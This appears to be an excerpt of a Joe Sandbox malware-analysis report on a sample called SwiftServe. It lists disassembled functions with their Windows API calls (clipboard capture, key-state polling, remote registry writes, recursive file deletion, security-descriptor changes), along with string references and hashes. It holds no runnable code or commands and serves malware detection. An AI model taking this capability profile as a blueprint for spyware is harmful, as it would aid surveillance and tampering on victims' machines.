Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 1980cd68a910862c9f8fbab570a4e86c10bfe914828ea01bcf1e63b602e56bba
Instruction ID: 957b5492fbbd610eb59a11412ee82ea6a2c0417fab4a03e75aed9bcb85979e7c
Opcode Fuzzy Hash: 1980cd68a910862c9f8fbab570a4e86c10bfe914828ea01bcf1e63b602e56bba
Instruction Fuzzy Hash: 7981AE71901209BFDF119FA0DD49AEF7BB9EF04308F059169F918B2262DB319E25DB60

Function 00E94632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00EB0980), ref: 00E9465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00E9466A
GetClipboardData.USER32(0000000D), ref: 00E94672
CloseClipboard.USER32 ref: 00E9467E
GlobalLock.KERNEL32(00000000), ref: 00E9469A
CloseClipboard.USER32 ref: 00E946A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E946B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00E946C6
GetClipboardData.USER32(00000001), ref: 00E946CE
GlobalLock.KERNEL32(00000000), ref: 00E946DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E9470F
CloseClipboard.USER32 ref: 00E9481F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 77c60b3187c0b1989e47ea0ce12fcec9e2c360b764e4dc32d72b95a32d25edac
Instruction ID: aaa3cebe19028eb74ecfcf200d3aa0cd0b1d723f43622ef83546944348bd7e57
Opcode Fuzzy Hash: 77c60b3187c0b1989e47ea0ce12fcec9e2c360b764e4dc32d72b95a32d25edac
Instruction Fuzzy Hash: 7B5192B12042056FDB14EF61DC49F6F77E8AF84B50F005629F555F21E2DB70E9098B62

Function 00E8F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E8F5F9
_wcscmp.LIBCMT ref: 00E8F60E
_wcscmp.LIBCMT ref: 00E8F625
GetFileAttributesW.KERNEL32(?), ref: 00E8F637
SetFileAttributesW.KERNEL32(?,?), ref: 00E8F651
FindNextFileW.KERNEL32(00000000,?), ref: 00E8F669
FindClose.KERNEL32(00000000), ref: 00E8F674
FindFirstFileW.KERNEL32(*.*,?), ref: 00E8F690
_wcscmp.LIBCMT ref: 00E8F6B7
_wcscmp.LIBCMT ref: 00E8F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8F6E0
SetCurrentDirectoryW.KERNEL32(00EDB578), ref: 00E8F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8F708
FindClose.KERNEL32(00000000), ref: 00E8F715
FindClose.KERNEL32(00000000), ref: 00E8F727

Strings

S, xrefs: 00E8F6E2
*.*, xrefs: 00E8F68B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*$S
API String ID: 1803514871-3360721001
Opcode ID: b7491bb0976ec304f27bfcf10d8d60adb332d518f7bf2fcf6ab433a13b9bbfd7
Instruction ID: d5a7ef085531eddca21ff1f00c08a817e5014ea95c3e0979405e928c245df090
Opcode Fuzzy Hash: b7491bb0976ec304f27bfcf10d8d60adb332d518f7bf2fcf6ab433a13b9bbfd7
Instruction Fuzzy Hash: D131A771541219AEDB10EBB5EC4D9DF77ACAF49325F101266F44CF21A0EB31EA48CB60

Function 00E8CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E8CDD0
FindClose.KERNEL32(00000000), ref: 00E8CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E8CE87
__swprintf.LIBCMT ref: 00E8CED3
__swprintf.LIBCMT ref: 00E8CF16

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

__swprintf.LIBCMT ref: 00E8CF6A

Part of subcall function 00E438C8: __woutput_l.LIBCMT ref: 00E43921

__swprintf.LIBCMT ref: 00E8CFB8

Part of subcall function 00E438C8: __flsbuf.LIBCMT ref: 00E43943
Part of subcall function 00E438C8: __flsbuf.LIBCMT ref: 00E4395B

__swprintf.LIBCMT ref: 00E8D007
__swprintf.LIBCMT ref: 00E8D056
__swprintf.LIBCMT ref: 00E8D0A5

Strings

%4d, xrefs: 00E8CF10
%02d, xrefs: 00E8CF5E, 00E8CF68, 00E8CFB6, 00E8D005, 00E8D054, 00E8D0A3
%4d%02d%02d%02d%02d%02d, xrefs: 00E8CECD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: c02e586b64cd8bb50b85c13344e2d19bb09b52b036f3bfeb96d3bcddaa06f215
Instruction ID: 4c36060ac5eedc10bda0461ac8a344c9adddbdf79f66571b93bbbb538741bb14
Opcode Fuzzy Hash: c02e586b64cd8bb50b85c13344e2d19bb09b52b036f3bfeb96d3bcddaa06f215
Instruction Fuzzy Hash: 85A13BB1408314ABD714EFA4DD85DAFB7ECEF94704F40191EF595A2191EB30EA08CB62

Function 00EA0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00EB0980,00000000,?,00000000,?,?), ref: 00EA1021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EA1069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EA10F2
RegCloseKey.ADVAPI32(?), ref: 00EA1412
RegCloseKey.ADVAPI32(00000000), ref: 00EA141F

Strings

REG_EXPAND_SZ, xrefs: 00EA108F
REG_SZ, xrefs: 00EA1130
REG_MULTI_SZ, xrefs: 00EA11DA
REG_BINARY, xrefs: 00EA13AD
REG_QWORD, xrefs: 00EA1360
REG_DWORD, xrefs: 00EA12E3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: e44722b59eecd8bacac0383321a3405a49f39a9d2cd00810e5d9cedfed00b3b4
Instruction ID: ac68124f695b1400588a0f1b1219290a6890463fc16c617f1431ed625cbe04e6
Opcode Fuzzy Hash: e44722b59eecd8bacac0383321a3405a49f39a9d2cd00810e5d9cedfed00b3b4
Instruction Fuzzy Hash: D10259752006119FCB14EF25D845E2ABBE5EF89714F04999CF899AB3A2CB34FC01CB91

Function 00E8F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E8F756
_wcscmp.LIBCMT ref: 00E8F76B
_wcscmp.LIBCMT ref: 00E8F782

Part of subcall function 00E84875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E84890

FindNextFileW.KERNEL32(00000000,?), ref: 00E8F7B1
FindClose.KERNEL32(00000000), ref: 00E8F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00E8F7D8
_wcscmp.LIBCMT ref: 00E8F7FF
_wcscmp.LIBCMT ref: 00E8F816
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8F828
SetCurrentDirectoryW.KERNEL32(00EDB578), ref: 00E8F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8F850
FindClose.KERNEL32(00000000), ref: 00E8F85D
FindClose.KERNEL32(00000000), ref: 00E8F86F

Strings

j, xrefs: 00E8F82A
*.*, xrefs: 00E8F7D3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*$j
API String ID: 1824444939-4121651432
Opcode ID: 723b7a4ea8935134333a68a6b3cae3d3ca1c064766b328617d060283fcd837cf
Instruction ID: 5cb567b90484cf13bc784d99cf36c7c49f780e37ec1b40b5374295d17351f94e
Opcode Fuzzy Hash: 723b7a4ea8935134333a68a6b3cae3d3ca1c064766b328617d060283fcd837cf
Instruction Fuzzy Hash: 7D31C77154021AAEEF14ABB5EC48ADF77ACDF49325F101166F80CB21A1EB31DA498B50

Function 00E788CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78E3C
Part of subcall function 00E78E20: GetLastError.KERNEL32(?,00E78900,?,?,?), ref: 00E78E46
Part of subcall function 00E78E20: GetProcessHeap.KERNEL32(00000008,?,?,00E78900,?,?,?), ref: 00E78E55
Part of subcall function 00E78E20: HeapAlloc.KERNEL32(00000000,?,00E78900,?,?,?), ref: 00E78E5C
Part of subcall function 00E78E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E78E73

Part of subcall function 00E78EBD: GetProcessHeap.KERNEL32(00000008,00E78916,00000000,00000000,?,00E78916,?), ref: 00E78EC9
Part of subcall function 00E78EBD: HeapAlloc.KERNEL32(00000000,?,00E78916,?), ref: 00E78ED0
Part of subcall function 00E78EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E78916,?), ref: 00E78EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E78931
_memset.LIBCMT ref: 00E78946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E78965
GetLengthSid.ADVAPI32(?), ref: 00E78976
GetAce.ADVAPI32(?,00000000,?), ref: 00E789B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E789CF
GetLengthSid.ADVAPI32(?), ref: 00E789EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E789FB
HeapAlloc.KERNEL32(00000000), ref: 00E78A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E78A23
CopySid.ADVAPI32(00000000), ref: 00E78A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E78A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E78A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E78A95

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 189037f912d33cba7ffaec77280b1cc02bd6bcf9d72c1e740d33b246c65b8956
Instruction ID: 05766107d1c6e9368bb75c6e15ebca07a8add27121011dc7ae1333eca56c1291
Opcode Fuzzy Hash: 189037f912d33cba7ffaec77280b1cc02bd6bcf9d72c1e740d33b246c65b8956
Instruction Fuzzy Hash: BE616C71940109BFDF01DFA5DD49EEEBBB9FF54304F04822AE919B6290DB31AA05CB61

Function 00EA0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA040D,?,?), ref: 00EA1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0B0C

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EA0BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EA0C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EA0E82
RegCloseKey.ADVAPI32(00000000), ref: 00EA0E8F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 88372f44774b2280519312bee0fa752dd715d6a3edb5c847b7422bdf1cfdce46
Instruction ID: 5e6ba8b2283d9dfbcd460682f2d49817dd82f3dd13e13775c3b5e0f5a135f86c
Opcode Fuzzy Hash: 88372f44774b2280519312bee0fa752dd715d6a3edb5c847b7422bdf1cfdce46
Instruction Fuzzy Hash: 8FE16D71204210AFCB14DF29C995E6BBBE4EF89714F04996DF849EB2A1DB30ED05CB51

Function 00E80508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E80530
GetAsyncKeyState.USER32(000000A0), ref: 00E805B1
GetKeyState.USER32(000000A0), ref: 00E805CC
GetAsyncKeyState.USER32(000000A1), ref: 00E805E6
GetKeyState.USER32(000000A1), ref: 00E805FB
GetAsyncKeyState.USER32(00000011), ref: 00E80613
GetKeyState.USER32(00000011), ref: 00E80625
GetAsyncKeyState.USER32(00000012), ref: 00E8063D
GetKeyState.USER32(00000012), ref: 00E8064F
GetAsyncKeyState.USER32(0000005B), ref: 00E80667
GetKeyState.USER32(0000005B), ref: 00E80679

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c47ec1394cc6cebb78176000c53509120c31e872cddc850b909ddfc9e0b30ac4
Instruction ID: 831d5696722916a1a40d9f57806f6f704d2e9bfcd8bb482ae7241873900beeb6
Opcode Fuzzy Hash: c47ec1394cc6cebb78176000c53509120c31e872cddc850b909ddfc9e0b30ac4
Instruction Fuzzy Hash: 2C41E7305047C96DFFB1A76488043B6BEA06B51308F086159D5CD769C1FAA499DCDBA2

Function 00E8443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00E84451
__swprintf.LIBCMT ref: 00E8445E

Part of subcall function 00E438C8: __woutput_l.LIBCMT ref: 00E43921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00E84488
LoadResource.KERNEL32(?,00000000), ref: 00E84494
LockResource.KERNEL32(00000000), ref: 00E844A1
FindResourceW.KERNEL32(?,?,00000003), ref: 00E844C1
LoadResource.KERNEL32(?,00000000), ref: 00E844D3
SizeofResource.KERNEL32(?,00000000), ref: 00E844E2
LockResource.KERNEL32(?), ref: 00E844EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E8454F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: c5ac96ecc7a843dbc384b54a67631ea3109d039d64b59b9fe3917f187f8aa574
Instruction ID: 61626d3c85ada61a32d565861970898cdd29f5ed1e3549ffe4551deb48aad516
Opcode Fuzzy Hash: c5ac96ecc7a843dbc384b54a67631ea3109d039d64b59b9fe3917f187f8aa574
Instruction Fuzzy Hash: 5F31C1B150121BAFDB11AFA1ED88ABF7BA8EF04304F004515F919F61A1DB34EA14CB60

Function 00E94830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E94857
EmptyClipboard.USER32 ref: 00E9485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00E94872
CloseClipboard.USER32 ref: 00E94911

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 85bd068642cca7608fd33571df22b29a87c2ec56d9a25dc7f8132650fec70f7e
Instruction ID: 821e1b718eebe6bdf1f62e214fbf30d8dee06e43e540168487a410be97034ba1
Opcode Fuzzy Hash: 85bd068642cca7608fd33571df22b29a87c2ec56d9a25dc7f8132650fec70f7e
Instruction Fuzzy Hash: EF21B2712012109FDB15AF25EC49F6F7BE8EF88725F008119F946BB2A1DB30AD05CB94

Function 00E83CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E32A58,?,00008000), ref: 00E402A4

Part of subcall function 00E84FEC: GetFileAttributesW.KERNEL32(?,00E83BFE), ref: 00E84FED

FindFirstFileW.KERNEL32(?,?), ref: 00E83D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E83E3E
MoveFileW.KERNEL32(?,?), ref: 00E83E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E83E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E83E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E83EAC

Strings

\*.*, xrefs: 00E83D41, 00E83D4A, 00E83D5F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 3f05a541455380382f27e2db6ac21ef3ff926892132806610b2714b62826ca4d
Instruction ID: 1e4ed497ada633f396d28f0d09771f7a9ddd69c92cf31cf8dc40fa7738330db7
Opcode Fuzzy Hash: 3f05a541455380382f27e2db6ac21ef3ff926892132806610b2714b62826ca4d
Instruction Fuzzy Hash: 9A51667180124D9ACF15FBE0C9569EEB7B9AF11305F2062A9E449B7192EF316F0DCB60

Function 00E8FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E8FA83
FindClose.KERNEL32(00000000), ref: 00E8FB96

Part of subcall function 00E252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E252E6

Sleep.KERNEL32(0000000A), ref: 00E8FAB3
_wcscmp.LIBCMT ref: 00E8FAC7
_wcscmp.LIBCMT ref: 00E8FAE2
FindNextFileW.KERNEL32(?,?), ref: 00E8FB80

Strings

*.*, xrefs: 00E8FA68

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 6eb6bfd1a08753790245411faa0003a295295215ce05242fc56e7c6f68a51f27
Instruction ID: fe8da60ddb23882703ac6fa9c7b05c90701071213c4effc1c7d67ec632c9c876
Opcode Fuzzy Hash: 6eb6bfd1a08753790245411faa0003a295295215ce05242fc56e7c6f68a51f27
Instruction Fuzzy Hash: 8B414C7194021A9FCF14EFA4CC59AEEBBB5FF05354F1455AAE818B22A1EB309E44CB50

Function 00E84005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E32A58,?,00008000), ref: 00E402A4

Part of subcall function 00E84FEC: GetFileAttributesW.KERNEL32(?,00E83BFE), ref: 00E84FED

FindFirstFileW.KERNEL32(?,?), ref: 00E8407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E840CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E840DD
FindClose.KERNEL32(00000000), ref: 00E840F4
FindClose.KERNEL32(00000000), ref: 00E840FD

Strings

\*.*, xrefs: 00E8404E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

